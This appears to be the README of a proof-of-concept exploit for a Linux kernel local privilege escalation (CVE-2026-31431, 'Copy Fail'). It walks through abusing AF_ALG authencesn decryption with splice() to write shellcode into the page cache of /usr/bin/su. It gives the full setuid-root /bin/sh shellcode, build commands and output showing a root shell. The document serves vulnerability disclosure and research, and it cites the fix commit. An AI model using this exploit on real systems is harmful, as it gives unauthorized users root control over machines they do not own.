Local privilege escalation exploit for CVE-2026-31431 (Copy Fail), a logic bug in the Linux kernel's authencesn cryptographic template that allows an unprivileged local user to perform a controlled 4-byte write into the page cache of any readable file.
- ELF parsing — resolves
/usr/bin/su's entry point virtual address to a file offset viaPT_LOADprogram headers - AF_ALG setup — binds to
authencesn(hmac(sha256),cbc(aes))with a zero key - 4-byte page cache writes — for each chunk of the shellcode payload:
sendmsg()sends AAD with the shellcode bytes asseqno_lo(bytes 4-7), withMSG_MOREsplice()delivers 32 bytes of the target file's page cache pages as the AEAD authentication tagrecv()triggers decryption —authencesn's scratch write lands in the chained page cache pages, writing 4 controlled bytes. The HMAC verification fails (EBADMSG) but the write persists
- Privilege escalation —
execl("/usr/bin/su")loads the corrupted page cache. The 40-byte shellcode (setuid(0)+execve("/bin/sh")) runs as setuid-root
xor edi, edi ; uid = 0
mov eax, 105 ; sys_setuid
syscall
xor edx, edx ; envp = NULL
push rdx ; null terminator
movabs rax, "/bin/sh" ; "/bin/sh\0"
push rax
mov rdi, rsp ; filename
push rdx ; NULL (argv[1])
push rdi ; argv[0]
mov rsi, rsp ; argv
mov eax, 59 ; sys_execve
syscallRequires musl-gcc or any C compiler with static linking support:
musl-gcc -static -O2 -s -o copyfail exploit.cAlternatively with GCC + glibc:
gcc -static -O2 -s -o copyfail exploit.c$ ./copyfail
[*] CVE-2026-31431 PoC (Copy Fail)
[*] /usr/bin/su entry @ file offset 0x78
[*] Patching page cache (40 bytes, 10 writes)
..........
[+] Executing /usr/bin/su
# id
uid=0(root) gid=1000(user) groups=1000(user)- Copy Fail: 732 Bytes to Root on Every Major Linux Distribution
- Fix commit a664bf3d
- Introduced by commit 72548b093ee3 (2017)
This proof-of-concept is provided for authorized security research and educational purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal.